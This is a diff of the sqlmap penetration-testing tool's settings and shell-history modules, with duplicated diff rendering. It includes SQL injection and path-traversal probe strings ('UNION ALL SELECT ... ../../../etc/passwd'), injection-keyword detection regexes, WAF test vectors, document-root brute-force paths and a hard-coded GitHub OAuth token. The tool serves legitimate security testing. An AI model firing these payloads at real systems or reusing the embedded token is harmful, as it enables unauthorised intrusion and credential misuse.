BLOCKED_IP_REGEX = r"(?i)(\A|\b)ip\b.*\b(banned|blocked|block list|firewall)"
|
||||||
|
|
||||||
# Dumping characters used in GROUP_CONCAT MySQL technique
|
# Dumping characters used in GROUP_CONCAT MySQL technique
|
||||||
CONCAT_ROW_DELIMITER = ','
|
CONCAT_ROW_DELIMITER = ','
|
||||||
CONCAT_VALUE_DELIMITER = '|'
|
CONCAT_VALUE_DELIMITER = '|'
|
||||||
|
@ -96,11 +119,14 @@ BACKDOOR_RUN_CMD_TIMEOUT = 5
|
||||||
# Maximum number of techniques used in inject.py/getValue() per one value
|
# Maximum number of techniques used in inject.py/getValue() per one value
|
||||||
MAX_TECHNIQUES_PER_VALUE = 2
|
MAX_TECHNIQUES_PER_VALUE = 2
|
||||||
|
|
||||||
|
# In case of missing piece of partial union dump, buffered array must be flushed after certain size
|
||||||
|
MAX_BUFFERED_PARTIAL_UNION_LENGTH = 1024
|
||||||
|
|
||||||
# Suffix used for naming meta databases in DBMS(es) without explicit database name
|
# Suffix used for naming meta databases in DBMS(es) without explicit database name
|
||||||
METADB_SUFFIX = "_masterdb"
|
METADB_SUFFIX = "_masterdb"
|
||||||
|
|
||||||
# Minimum time response set needed for time-comparison based on standard deviation
|
# Minimum time response set needed for time-comparison based on standard deviation
|
||||||
MIN_TIME_RESPONSES = 15
|
MIN_TIME_RESPONSES = 30
|
||||||
|
|
||||||
# Minimum comparison ratio set needed for searching valid union column number based on standard deviation
|
# Minimum comparison ratio set needed for searching valid union column number based on standard deviation
|
||||||
MIN_UNION_RESPONSES = 5
|
MIN_UNION_RESPONSES = 5
|
||||||
|
@ -120,10 +146,10 @@ INFERENCE_EQUALS_CHAR = "="
|
||||||
# Character used for operation "not-equals" in inference
|
# Character used for operation "not-equals" in inference
|
||||||
INFERENCE_NOT_EQUALS_CHAR = "!="
|
INFERENCE_NOT_EQUALS_CHAR = "!="
|
||||||
|
|
||||||
# String used for representation of unknown dbms
|
# String used for representation of unknown DBMS
|
||||||
UNKNOWN_DBMS = "Unknown"
|
UNKNOWN_DBMS = "Unknown"
|
||||||
|
|
||||||
# String used for representation of unknown dbms version
|
# String used for representation of unknown DBMS version
|
||||||
UNKNOWN_DBMS_VERSION = "Unknown"
|
UNKNOWN_DBMS_VERSION = "Unknown"
|
||||||
|
|
||||||
# Dynamicity mark length used in dynamicity removal engine
|
# Dynamicity mark length used in dynamicity removal engine
|
||||||
|
@ -145,7 +171,7 @@ IS_WIN = subprocess.mswindows
|
||||||
PLATFORM = os.name
|
PLATFORM = os.name
|
||||||
PYVERSION = sys.version.split()[0]
|
PYVERSION = sys.version.split()[0]
|
||||||
|
|
||||||
# Database management system specific variables
|
# DBMS system databases
|
||||||
MSSQL_SYSTEM_DBS = ("Northwind", "master", "model", "msdb", "pubs", "tempdb")
|
MSSQL_SYSTEM_DBS = ("Northwind", "master", "model", "msdb", "pubs", "tempdb")
|
||||||
MYSQL_SYSTEM_DBS = ("information_schema", "mysql") # Before MySQL 5.0 only "mysql"
|
MYSQL_SYSTEM_DBS = ("information_schema", "mysql") # Before MySQL 5.0 only "mysql"
|
||||||
PGSQL_SYSTEM_DBS = ("information_schema", "pg_catalog", "pg_toast")
|
PGSQL_SYSTEM_DBS = ("information_schema", "pg_catalog", "pg_toast")
|
||||||
|
@ -182,10 +208,15 @@ DBMS_DIRECTORY_DICT = dict((getattr(DBMS, _), getattr(DBMS_DIRECTORY_NAME, _)) f
|
||||||
SUPPORTED_DBMS = MSSQL_ALIASES + MYSQL_ALIASES + PGSQL_ALIASES + ORACLE_ALIASES + SQLITE_ALIASES + ACCESS_ALIASES + FIREBIRD_ALIASES + MAXDB_ALIASES + SYBASE_ALIASES + DB2_ALIASES + HSQLDB_ALIASES
|
SUPPORTED_DBMS = MSSQL_ALIASES + MYSQL_ALIASES + PGSQL_ALIASES + ORACLE_ALIASES + SQLITE_ALIASES + ACCESS_ALIASES + FIREBIRD_ALIASES + MAXDB_ALIASES + SYBASE_ALIASES + DB2_ALIASES + HSQLDB_ALIASES
|
||||||
SUPPORTED_OS = ("linux", "windows")
|
SUPPORTED_OS = ("linux", "windows")
|
||||||
|
|
||||||
|
DBMS_ALIASES = ((DBMS.MSSQL, MSSQL_ALIASES), (DBMS.MYSQL, MYSQL_ALIASES), (DBMS.PGSQL, PGSQL_ALIASES), (DBMS.ORACLE, ORACLE_ALIASES), (DBMS.SQLITE, SQLITE_ALIASES), (DBMS.ACCESS, ACCESS_ALIASES), (DBMS.FIREBIRD, FIREBIRD_ALIASES), (DBMS.MAXDB, MAXDB_ALIASES), (DBMS.SYBASE, SYBASE_ALIASES), (DBMS.DB2, DB2_ALIASES), (DBMS.HSQLDB, HSQLDB_ALIASES))
|
||||||
|
|
||||||
USER_AGENT_ALIASES = ("ua", "useragent", "user-agent")
|
USER_AGENT_ALIASES = ("ua", "useragent", "user-agent")
|
||||||
REFERER_ALIASES = ("ref", "referer", "referrer")
|
REFERER_ALIASES = ("ref", "referer", "referrer")
|
||||||
HOST_ALIASES = ("host",)
|
HOST_ALIASES = ("host",)
|
||||||
|
|
||||||
|
# Names that can't be used to name files on Windows OS
|
||||||
|
WINDOWS_RESERVED_NAMES = ("CON", "PRN", "AUX", "NUL", "COM1", "COM2", "COM3", "COM4", "COM5", "COM6", "COM7", "COM8", "COM9", "LPT1", "LPT2", "LPT3", "LPT4", "LPT5", "LPT6", "LPT7", "LPT8", "LPT9")
|
||||||
|
|
||||||
# Items displayed in basic help (-h) output
|
# Items displayed in basic help (-h) output
|
||||||
BASIC_HELP_ITEMS = (
|
BASIC_HELP_ITEMS = (
|
||||||
"url",
|
"url",
|
||||||
|
@ -218,6 +249,7 @@ BASIC_HELP_ITEMS = (
|
||||||
"checkTor",
|
"checkTor",
|
||||||
"flushSession",
|
"flushSession",
|
||||||
"tor",
|
"tor",
|
||||||
|
"sqlmapShell",
|
||||||
"wizard",
|
"wizard",
|
||||||
)
|
)
|
||||||
|
|
||||||
|
@ -239,10 +271,10 @@ ERROR_PARSING_REGEXES = (
|
||||||
)
|
)
|
||||||
|
|
||||||
# Regular expression used for parsing charset info from meta html headers
|
# Regular expression used for parsing charset info from meta html headers
|
||||||
META_CHARSET_REGEX = r'(?si)<head>.*<meta http-equiv="?content-type"?[^>]+charset=(?P<result>[^">]+).*</head>'
|
META_CHARSET_REGEX = r'(?si)<head>.*<meta[^>]+charset="?(?P<result>[^"> ]+).*</head>'
|
||||||
|
|
||||||
# Regular expression used for parsing refresh info from meta html headers
|
# Regular expression used for parsing refresh info from meta html headers
|
||||||
META_REFRESH_REGEX = r'(?si)<head>.*<meta http-equiv="?refresh"?[^>]+content="?[^">]+url=(?P<result>[^">]+).*</head>'
|
META_REFRESH_REGEX = r'(?si)<head>(?!.*?<noscript.*?</head).*?<meta http-equiv="?refresh"?[^>]+content="?[^">]+url=["\']?(?P<result>[^\'">]+).*</head>'
|
||||||
|
|
||||||
# Regular expression used for parsing empty fields in tested form data
|
# Regular expression used for parsing empty fields in tested form data
|
||||||
EMPTY_FORM_FIELDS_REGEX = r'(&|\A)(?P<result>[^=]+=(&|\Z))'
|
EMPTY_FORM_FIELDS_REGEX = r'(&|\A)(?P<result>[^=]+=(&|\Z))'
|
||||||
|
@ -259,6 +291,9 @@ WEBSCARAB_SPLITTER = "### Conversation"
|
||||||
# Splitter used between requests in BURP log files
|
# Splitter used between requests in BURP log files
|
||||||
BURP_REQUEST_REGEX = r"={10,}\s+[^=]+={10,}\s(.+?)\s={10,}"
|
BURP_REQUEST_REGEX = r"={10,}\s+[^=]+={10,}\s(.+?)\s={10,}"
|
||||||
|
|
||||||
|
# Regex used for parsing XML Burp saved history items
|
||||||
|
BURP_XML_HISTORY_REGEX = r'<port>(\d+)</port>.+?<request base64="true"><!\[CDATA\[([^]]+)'
|
||||||
|
|
||||||
# Encoding used for Unicode data
|
# Encoding used for Unicode data
|
||||||
UNICODE_ENCODING = "utf8"
|
UNICODE_ENCODING = "utf8"
|
||||||
|
|
||||||
|
@ -305,7 +340,7 @@ REFLECTED_VALUE_MARKER = "__REFLECTED_VALUE__"
|
||||||
REFLECTED_BORDER_REGEX = r"[^A-Za-z]+"
|
REFLECTED_BORDER_REGEX = r"[^A-Za-z]+"
|
||||||
|
|
||||||
# Regular expression used for replacing non-alphanum characters
|
# Regular expression used for replacing non-alphanum characters
|
||||||
REFLECTED_REPLACEMENT_REGEX = r".+?"
|
REFLECTED_REPLACEMENT_REGEX = r".+"
|
||||||
|
|
||||||
# Maximum number of alpha-numerical parts in reflected regex (for speed purposes)
|
# Maximum number of alpha-numerical parts in reflected regex (for speed purposes)
|
||||||
REFLECTED_MAX_REGEX_PARTS = 10
|
REFLECTED_MAX_REGEX_PARTS = 10
|
||||||
|
@ -334,6 +369,12 @@ IGNORE_PARAMETERS = ("__VIEWSTATE", "__VIEWSTATEENCRYPTED", "__EVENTARGUMENT", "
|
||||||
# Regular expression used for recognition of ASP.NET control parameters
|
# Regular expression used for recognition of ASP.NET control parameters
|
||||||
ASP_NET_CONTROL_REGEX = r"(?i)\Actl\d+\$"
|
ASP_NET_CONTROL_REGEX = r"(?i)\Actl\d+\$"
|
||||||
|
|
||||||
|
# Prefix for Google analytics cookie names
|
||||||
|
GOOGLE_ANALYTICS_COOKIE_PREFIX = "__UTM"
|
||||||
|
|
||||||
|
# Prefix for configuration overriding environment variables
|
||||||
|
SQLMAP_ENVIRONMENT_PREFIX = "SQLMAP_"
|
||||||
|
|
||||||
# Turn off resume console info to avoid potential slowdowns
|
# Turn off resume console info to avoid potential slowdowns
|
||||||
TURN_OFF_RESUME_INFO_LIMIT = 20
|
TURN_OFF_RESUME_INFO_LIMIT = 20
|
||||||
|
|
||||||
|
@ -377,13 +418,13 @@ ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
|
||||||
DUMMY_SQL_INJECTION_CHARS = ";()'"
|
DUMMY_SQL_INJECTION_CHARS = ";()'"
|
||||||
|
|
||||||
# Simple check against dummy users
|
# Simple check against dummy users
|
||||||
DUMMY_USER_INJECTION = r"(?i)[^\w](AND|OR)\s+[^\s]+[=><]"
|
DUMMY_USER_INJECTION = r"(?i)[^\w](AND|OR)\s+[^\s]+[=><]|\bUNION\b.+\bSELECT\b|\bSELECT\b.+\bFROM\b|\b(CONCAT|information_schema|SLEEP|DELAY)\b"
|
||||||
|
|
||||||
# Extensions skipped by crawler
|
# Extensions skipped by crawler
|
||||||
CRAWL_EXCLUDE_EXTENSIONS = ("gif", "jpg", "jar", "tif", "bmp", "war", "ear", "mpg", "wmv", "mpeg", "scm", "iso", "dmp", "dll", "cab", "so", "avi", "bin", "exe", "iso", "tar", "png", "pdf", "ps", "mp3", "zip", "rar", "gz")
|
CRAWL_EXCLUDE_EXTENSIONS = ("gif", "jpg", "jpeg", "image", "jar", "tif", "bmp", "war", "ear", "mpg", "mpeg", "wmv", "mpeg", "scm", "iso", "dmp", "dll", "cab", "so", "avi", "mkv", "bin", "iso", "tar", "png", "pdf", "ps", "wav", "mp3", "mp4", "au", "aiff", "aac", "zip", "rar", "7z", "gz", "flv", "mov", "doc", "docx", "xls", "dot", "dotx", "xlt", "xlsx", "ppt", "pps", "pptx")
|
||||||
|
|
||||||
# Patterns often seen in HTTP headers containing custom injection marking character
|
# Patterns often seen in HTTP headers containing custom injection marking character
|
||||||
PROBLEMATIC_CUSTOM_INJECTION_PATTERNS = r"(\bq=[^;']+)|(\*/\*)"
|
PROBLEMATIC_CUSTOM_INJECTION_PATTERNS = r"(;q=[^;']+)|(\*/\*)"
|
||||||
|
|
||||||
# Template used for common table existence check
|
# Template used for common table existence check
|
||||||
BRUTE_TABLE_EXISTS_TEMPLATE = "EXISTS(SELECT %d FROM %s)"
|
BRUTE_TABLE_EXISTS_TEMPLATE = "EXISTS(SELECT %d FROM %s)"
|
||||||
|
@ -392,7 +433,7 @@ BRUTE_TABLE_EXISTS_TEMPLATE = "EXISTS(SELECT %d FROM %s)"
|
||||||
BRUTE_COLUMN_EXISTS_TEMPLATE = "EXISTS(SELECT %s FROM %s)"
|
BRUTE_COLUMN_EXISTS_TEMPLATE = "EXISTS(SELECT %s FROM %s)"
|
||||||
|
|
||||||
# Payload used for checking of existence of IDS/WAF (dummier the better)
|
# Payload used for checking of existence of IDS/WAF (dummier the better)
|
||||||
IDS_WAF_CHECK_PAYLOAD = "AND 1=1 UNION ALL SELECT 1,2,3,table_name FROM information_schema.tables WHERE 2>1"
|
IDS_WAF_CHECK_PAYLOAD = "AND 1=1 UNION ALL SELECT 1,2,3,table_name FROM information_schema.tables WHERE 2>1-- ../../../etc/passwd"
|
||||||
|
|
||||||
# Vectors used for provoking specific WAF/IDS/IPS behavior(s)
|
# Vectors used for provoking specific WAF/IDS/IPS behavior(s)
|
||||||
WAF_ATTACK_VECTORS = (
|
WAF_ATTACK_VECTORS = (
|
||||||
|
@ -406,8 +447,8 @@ WAF_ATTACK_VECTORS = (
|
||||||
# Used for status representation in dictionary attack phase
|
# Used for status representation in dictionary attack phase
|
||||||
ROTATING_CHARS = ('\\', '|', '|', '/', '-')
|
ROTATING_CHARS = ('\\', '|', '|', '/', '-')
|
||||||
|
|
||||||
# Chunk length (in items) used by BigArray objects (only last chunk and cached one are held in memory)
|
# Approximate chunk length (in bytes) used by BigArray objects (only last chunk and cached one are held in memory)
|
||||||
BIGARRAY_CHUNK_LENGTH = 4096
|
BIGARRAY_CHUNK_SIZE = 1024 * 1024
|
||||||
|
|
||||||
# Only console display last n table rows
|
# Only console display last n table rows
|
||||||
TRIM_STDOUT_DUMP_SIZE = 256
|
TRIM_STDOUT_DUMP_SIZE = 256
|
||||||
|
@ -442,14 +483,20 @@ DEFAULT_COOKIE_DELIMITER = ';'
|
||||||
# Unix timestamp used for forcing cookie expiration when provided with --load-cookies
|
# Unix timestamp used for forcing cookie expiration when provided with --load-cookies
|
||||||
FORCE_COOKIE_EXPIRATION_TIME = "9999999999"
|
FORCE_COOKIE_EXPIRATION_TIME = "9999999999"
|
||||||
|
|
||||||
|
# Github OAuth token used for creating an automatic Issue for unhandled exceptions
|
||||||
|
GITHUB_REPORT_OAUTH_TOKEN = "f05e68171afd41a445b1fff80f369fae88b37968"
|
||||||
|
|
||||||
# Skip unforced HashDB flush requests below the threshold number of cached items
|
# Skip unforced HashDB flush requests below the threshold number of cached items
|
||||||
HASHDB_FLUSH_THRESHOLD = 32
|
HASHDB_FLUSH_THRESHOLD = 32
|
||||||
|
|
||||||
# Number of retries for unsuccessful HashDB flush attempts
|
# Number of retries for unsuccessful HashDB flush attempts
|
||||||
HASHDB_FLUSH_RETRIES = 3
|
HASHDB_FLUSH_RETRIES = 3
|
||||||
|
|
||||||
|
# Number of retries for unsuccessful HashDB end transaction attempts
|
||||||
|
HASHDB_END_TRANSACTION_RETRIES = 3
|
||||||
|
|
||||||
# Unique milestone value used for forced deprecation of old HashDB values (e.g. when changing hash/pickle mechanism)
|
# Unique milestone value used for forced deprecation of old HashDB values (e.g. when changing hash/pickle mechanism)
|
||||||
HASHDB_MILESTONE_VALUE = "cAWxkLYCQT" # r5129 "".join(random.sample(string.ascii_letters, 10))
|
HASHDB_MILESTONE_VALUE = "JHjrBugdDA" # "".join(random.sample(string.ascii_letters, 10))
|
||||||
|
|
||||||
# Warn user of possible delay due to large page dump in full UNION query injections
|
# Warn user of possible delay due to large page dump in full UNION query injections
|
||||||
LARGE_OUTPUT_THRESHOLD = 1024 ** 2
|
LARGE_OUTPUT_THRESHOLD = 1024 ** 2
|
||||||
|
@ -473,7 +520,10 @@ MAX_DNS_LABEL = 63
|
||||||
DNS_BOUNDARIES_ALPHABET = re.sub("[a-fA-F]", "", string.ascii_letters)
|
DNS_BOUNDARIES_ALPHABET = re.sub("[a-fA-F]", "", string.ascii_letters)
|
||||||
|
|
||||||
# Alphabet used for heuristic checks
|
# Alphabet used for heuristic checks
|
||||||
HEURISTIC_CHECK_ALPHABET = ('"', '\'', ')', '(', '[', ']', ',', '.')
|
HEURISTIC_CHECK_ALPHABET = ('"', '\'', ')', '(', ',', '.')
|
||||||
|
|
||||||
|
# String used for dummy XSS check of a tested parameter value
|
||||||
|
DUMMY_XSS_CHECK_APPENDIX = "<'\">"
|
||||||
|
|
||||||
# Connection chunk size (processing large responses in chunks to avoid MemoryError crashes - e.g. large table dump in full UNION injections)
|
# Connection chunk size (processing large responses in chunks to avoid MemoryError crashes - e.g. large table dump in full UNION injections)
|
||||||
MAX_CONNECTION_CHUNK_SIZE = 10 * 1024 * 1024
|
MAX_CONNECTION_CHUNK_SIZE = 10 * 1024 * 1024
|
||||||
|
@ -481,6 +531,9 @@ MAX_CONNECTION_CHUNK_SIZE = 10 * 1024 * 1024
|
||||||
# Maximum response total page size (trimmed if larger)
|
# Maximum response total page size (trimmed if larger)
|
||||||
MAX_CONNECTION_TOTAL_SIZE = 100 * 1024 * 1024
|
MAX_CONNECTION_TOTAL_SIZE = 100 * 1024 * 1024
|
||||||
|
|
||||||
|
# Maximum (multi-threaded) length of entry in bisection algorithm
|
||||||
|
MAX_BISECTION_LENGTH = 50 * 1024 * 1024
|
||||||
|
|
||||||
# Mark used for trimming unnecessary content in large chunks
|
# Mark used for trimming unnecessary content in large chunks
|
||||||
LARGE_CHUNK_TRIM_MARKER = "__TRIMMED_CONTENT__"
|
LARGE_CHUNK_TRIM_MARKER = "__TRIMMED_CONTENT__"
|
||||||
|
|
||||||
|
@ -494,7 +547,7 @@ VALID_TIME_CHARS_RUN_THRESHOLD = 100
|
||||||
CHECK_ZERO_COLUMNS_THRESHOLD = 10
|
CHECK_ZERO_COLUMNS_THRESHOLD = 10
|
||||||
|
|
||||||
# Boldify all logger messages containing these "patterns"
|
# Boldify all logger messages containing these "patterns"
|
||||||
BOLD_PATTERNS = ("' injectable", "might be injectable", "' is vulnerable", "is not injectable", "test failed", "test passed", "live test final result", "test shows that")
|
BOLD_PATTERNS = ("' injectable", "might be injectable", "' is vulnerable", "is not injectable", "test failed", "test passed", "live test final result", "test shows that", "the back-end DBMS is", "created Github", "blocked by the target server", "protection is involved")
|
||||||
|
|
||||||
# Generic www root directory names
|
# Generic www root directory names
|
||||||
GENERIC_DOC_ROOT_DIRECTORY_NAMES = ("htdocs", "httpdocs", "public", "wwwroot", "www")
|
GENERIC_DOC_ROOT_DIRECTORY_NAMES = ("htdocs", "httpdocs", "public", "wwwroot", "www")
|
||||||
|
@ -506,7 +559,7 @@ MAX_HELP_OPTION_LENGTH = 18
|
||||||
MAX_CONNECT_RETRIES = 100
|
MAX_CONNECT_RETRIES = 100
|
||||||
|
|
||||||
# Strings for detecting formatting errors
|
# Strings for detecting formatting errors
|
||||||
FORMAT_EXCEPTION_STRINGS = ("Type mismatch", "Error converting", "Failed to convert", "System.FormatException", "java.lang.NumberFormatException")
|
FORMAT_EXCEPTION_STRINGS = ("Type mismatch", "Error converting", "Failed to convert", "System.FormatException", "java.lang.NumberFormatException", "ValueError: invalid literal")
|
||||||
|
|
||||||
# Regular expression used for extracting ASP.NET view state values
|
# Regular expression used for extracting ASP.NET view state values
|
||||||
VIEWSTATE_REGEX = r'(?i)(?P<name>__VIEWSTATE[^"]*)[^>]+value="(?P<result>[^"]+)'
|
VIEWSTATE_REGEX = r'(?i)(?P<name>__VIEWSTATE[^"]*)[^>]+value="(?P<result>[^"]+)'
|
||||||
|
@ -520,15 +573,21 @@ LIMITED_ROWS_TEST_NUMBER = 15
|
||||||
# Format used for representing invalid unicode characters
|
# Format used for representing invalid unicode characters
|
||||||
INVALID_UNICODE_CHAR_FORMAT = r"\?%02x"
|
INVALID_UNICODE_CHAR_FORMAT = r"\?%02x"
|
||||||
|
|
||||||
# Regular expression for SOAP-like POST data
|
# Regular expression for XML POST data
|
||||||
SOAP_RECOGNITION_REGEX = r"(?s)\A(<\?xml[^>]+>)?\s*<([^> ]+)( [^>]+)?>.+</\2.*>\s*\Z"
|
XML_RECOGNITION_REGEX = r"(?s)\A\s*<[^>]+>(.+>)?\s*\Z"
|
||||||
|
|
||||||
|
# Regular expression used for detecting JSON POST data
|
||||||
|
JSON_RECOGNITION_REGEX = r'(?s)\A(\s*\[)*\s*\{.*"[^"]+"\s*:\s*("[^"]+"|\d+).*\}\s*(\]\s*)*\Z'
|
||||||
|
|
||||||
# Regular expression used for detecting JSON-like POST data
|
# Regular expression used for detecting JSON-like POST data
|
||||||
JSON_RECOGNITION_REGEX = r'(?s)\A\s*\{.*"[^"]+"\s*:\s*("[^"]+"|\d+).*\}\s*\Z'
|
JSON_LIKE_RECOGNITION_REGEX = r"(?s)\A(\s*\[)*\s*\{.*'[^']+'\s*:\s*('[^']+'|\d+).*\}\s*(\]\s*)*\Z"
|
||||||
|
|
||||||
# Regular expression used for detecting multipart POST data
|
# Regular expression used for detecting multipart POST data
|
||||||
MULTIPART_RECOGNITION_REGEX = r"(?i)Content-Disposition:[^;]+;\s*name="
|
MULTIPART_RECOGNITION_REGEX = r"(?i)Content-Disposition:[^;]+;\s*name="
|
||||||
|
|
||||||
|
# Regular expression used for detecting Array-like POST data
|
||||||
|
ARRAY_LIKE_RECOGNITION_REGEX = r"(\A|%s)(\w+)\[\]=.+%s\2\[\]=" % (DEFAULT_GET_POST_DELIMITER, DEFAULT_GET_POST_DELIMITER)
|
||||||
|
|
||||||
# Default POST data content-type
|
# Default POST data content-type
|
||||||
DEFAULT_CONTENT_TYPE = "application/x-www-form-urlencoded; charset=utf-8"
|
DEFAULT_CONTENT_TYPE = "application/x-www-form-urlencoded; charset=utf-8"
|
||||||
|
|
||||||
|
@ -544,23 +603,32 @@ MIN_BINARY_DISK_DUMP_SIZE = 100
|
||||||
# Regular expression used for extracting form tags
|
# Regular expression used for extracting form tags
|
||||||
FORM_SEARCH_REGEX = r"(?si)<form(?!.+<form).+?</form>"
|
FORM_SEARCH_REGEX = r"(?si)<form(?!.+<form).+?</form>"
|
||||||
|
|
||||||
|
# Maximum number of lines to save in history file
|
||||||
|
MAX_HISTORY_LENGTH = 1000
|
||||||
|
|
||||||
# Minimum field entry length needed for encoded content (hex, base64,...) check
|
# Minimum field entry length needed for encoded content (hex, base64,...) check
|
||||||
MIN_ENCODED_LEN_CHECK = 5
|
MIN_ENCODED_LEN_CHECK = 5
|
||||||
|
|
||||||
# Timeout in seconds in which Metasploit remote session has to be initialized
|
# Timeout in seconds in which Metasploit remote session has to be initialized
|
||||||
METASPLOIT_SESSION_TIMEOUT = 180
|
METASPLOIT_SESSION_TIMEOUT = 300
|
||||||
|
|
||||||
|
# Suffix used to mark variables having keyword names
|
||||||
|
EVALCODE_KEYWORD_SUFFIX = "_KEYWORD"
|
||||||
|
|
||||||
# Reference: http://www.cookiecentral.com/faq/#3.5
|
# Reference: http://www.cookiecentral.com/faq/#3.5
|
||||||
NETSCAPE_FORMAT_HEADER_COOKIES = "# Netscape HTTP Cookie File."
|
NETSCAPE_FORMAT_HEADER_COOKIES = "# Netscape HTTP Cookie File."
|
||||||
|
|
||||||
|
# Infixes used for automatic recognition of parameters carrying anti-CSRF tokens
|
||||||
|
CSRF_TOKEN_PARAMETER_INFIXES = ("csrf", "xsrf")
|
||||||
|
|
||||||
# Prefixes used in brute force search for web server document root
|
# Prefixes used in brute force search for web server document root
|
||||||
BRUTE_DOC_ROOT_PREFIXES = {
|
BRUTE_DOC_ROOT_PREFIXES = {
|
||||||
OS.LINUX: ("/var/www", "/var/www/%TARGET%", "/var/www/vhosts/%TARGET%", "/var/www/virtual/%TARGET%", "/var/www/clients/vhosts/%TARGET%", "/var/www/clients/virtual/%TARGET%"),
|
OS.LINUX: ("/var/www", "/usr/local/apache", "/usr/local/apache2", "/usr/local/www/apache22", "/usr/local/www/apache24", "/usr/local/httpd", "/var/www/nginx-default", "/srv/www", "/var/www/%TARGET%", "/var/www/vhosts/%TARGET%", "/var/www/virtual/%TARGET%", "/var/www/clients/vhosts/%TARGET%", "/var/www/clients/virtual/%TARGET%"),
|
||||||
OS.WINDOWS: ("/xampp", "/Program Files/xampp/", "/wamp", "/Program Files/wampp/", "/Inetpub/wwwroot", "/Inetpub/wwwroot/%TARGET%", "/Inetpub/vhosts/%TARGET%")
|
OS.WINDOWS: ("/xampp", "/Program Files/xampp", "/wamp", "/Program Files/wampp", "/apache", "/Program Files/Apache Group/Apache", "/Program Files/Apache Group/Apache2", "/Program Files/Apache Group/Apache2.2", "/Program Files/Apache Group/Apache2.4", "/Inetpub/wwwroot", "/Inetpub/wwwroot/%TARGET%", "/Inetpub/vhosts/%TARGET%")
|
||||||
}
|
}
|
||||||
|
|
||||||
# Suffixes used in brute force search for web server document root
|
# Suffixes used in brute force search for web server document root
|
||||||
BRUTE_DOC_ROOT_SUFFIXES = ("", "html", "htdocs", "httpdocs", "php", "public", "src", "site", "build", "web", "sites/all", "www/build")
|
BRUTE_DOC_ROOT_SUFFIXES = ("", "html", "htdocs", "httpdocs", "php", "public", "src", "site", "build", "web", "data", "sites/all", "www/build")
|
||||||
|
|
||||||
# String used for marking target name inside used brute force web server document root
|
# String used for marking target name inside used brute force web server document root
|
||||||
BRUTE_DOC_ROOT_TARGET_MARK = "%TARGET%"
|
BRUTE_DOC_ROOT_TARGET_MARK = "%TARGET%"
|
||||||
|
@ -568,6 +636,9 @@ BRUTE_DOC_ROOT_TARGET_MARK = "%TARGET%"
|
||||||
# Character used as a boundary in kb.chars (preferably less frequent letter)
|
# Character used as a boundary in kb.chars (preferably less frequent letter)
|
||||||
KB_CHARS_BOUNDARY_CHAR = 'q'
|
KB_CHARS_BOUNDARY_CHAR = 'q'
|
||||||
|
|
||||||
|
# Letters of lower frequency used in kb.chars
|
||||||
|
KB_CHARS_LOW_FREQUENCY_ALPHABET = "zqxjkvbp"
|
||||||
|
|
||||||
# CSS style used in HTML dump format
|
# CSS style used in HTML dump format
|
||||||
HTML_DUMP_CSS_STYLE = """<style>
|
HTML_DUMP_CSS_STYLE = """<style>
|
||||||
table{
|
table{
|
||||||
|
@ -588,4 +659,7 @@ tr:nth-child(even) {
|
||||||
td{
|
td{
|
||||||
font-size:10px;
|
font-size:10px;
|
||||||
}
|
}
|
||||||
|
th{
|
||||||
|
font-size:10px;
|
||||||
|
}
|
||||||
</style>"""
|
</style>"""
|
||||||
|
|
|
@ -1,7 +1,7 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'doc/COPYING' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
@ -13,14 +13,60 @@ from lib.core import readlineng as readline
|
||||||
from lib.core.common import Backend
|
from lib.core.common import Backend
|
||||||
from lib.core.data import logger
|
from lib.core.data import logger
|
||||||
from lib.core.data import paths
|
from lib.core.data import paths
|
||||||
|
from lib.core.enums import AUTOCOMPLETE_TYPE
|
||||||
from lib.core.enums import OS
|
from lib.core.enums import OS
|
||||||
|
from lib.core.settings import MAX_HISTORY_LENGTH
|
||||||
|
|
||||||
def saveHistory():
|
def readlineAvailable():
|
||||||
historyPath = os.path.expanduser(paths.SQLMAP_HISTORY)
|
"""
|
||||||
readline.write_history_file(historyPath)
|
Check if the readline is available. By default
|
||||||
|
it is not in Python default installation on Windows
|
||||||
|
"""
|
||||||
|
|
||||||
def loadHistory():
|
return readline._readline is not None
|
||||||
historyPath = os.path.expanduser(paths.SQLMAP_HISTORY)
|
|
||||||
|
def clearHistory():
|
||||||
|
if not readlineAvailable():
|
||||||
|
return
|
||||||
|
|
||||||
|
readline.clear_history()
|
||||||
|
|
||||||
|
def saveHistory(completion=None):
|
||||||
|
if not readlineAvailable():
|
||||||
|
return
|
||||||
|
|
||||||
|
if completion == AUTOCOMPLETE_TYPE.SQL:
|
||||||
|
historyPath = paths.SQL_SHELL_HISTORY
|
||||||
|
elif completion == AUTOCOMPLETE_TYPE.OS:
|
||||||
|
historyPath = paths.OS_SHELL_HISTORY
|
||||||
|
else:
|
||||||
|
historyPath = paths.SQLMAP_SHELL_HISTORY
|
||||||
|
|
||||||
|
try:
|
||||||
|
with open(historyPath, "w+") as f:
|
||||||
|
pass
|
||||||
|
except:
|
||||||
|
pass
|
||||||
|
|
||||||
|
readline.set_history_length(MAX_HISTORY_LENGTH)
|
||||||
|
try:
|
||||||
|
readline.write_history_file(historyPath)
|
||||||
|
except IOError, msg:
|
||||||
|
warnMsg = "there was a problem writing the history file '%s' (%s)" % (historyPath, msg)
|
||||||
|
logger.warn(warnMsg)
|
||||||
|
|
||||||
|
def loadHistory(completion=None):
|
||||||
|
if not readlineAvailable():
|
||||||
|
return
|
||||||
|
|
||||||
|
clearHistory()
|
||||||
|
|
||||||
|
if completion == AUTOCOMPLETE_TYPE.SQL:
|
||||||
|
historyPath = paths.SQL_SHELL_HISTORY
|
||||||
|
elif completion == AUTOCOMPLETE_TYPE.OS:
|
||||||
|
historyPath = paths.OS_SHELL_HISTORY
|
||||||
|
else:
|
||||||
|
historyPath = paths.SQLMAP_SHELL_HISTORY
|
||||||
|
|
||||||
if os.path.exists(historyPath):
|
if os.path.exists(historyPath):
|
||||||
try:
|
try:
|
||||||
|
@ -47,14 +93,12 @@ class CompleterNG(rlcompleter.Completer):
|
||||||
|
|
||||||
return matches
|
return matches
|
||||||
|
|
||||||
def autoCompletion(sqlShell=False, osShell=False):
|
def autoCompletion(completion=None, os=None, commands=None):
|
||||||
# First of all we check if the readline is available, by default
|
if not readlineAvailable():
|
||||||
# it is not in Python default installation on Windows
|
|
||||||
if not readline._readline:
|
|
||||||
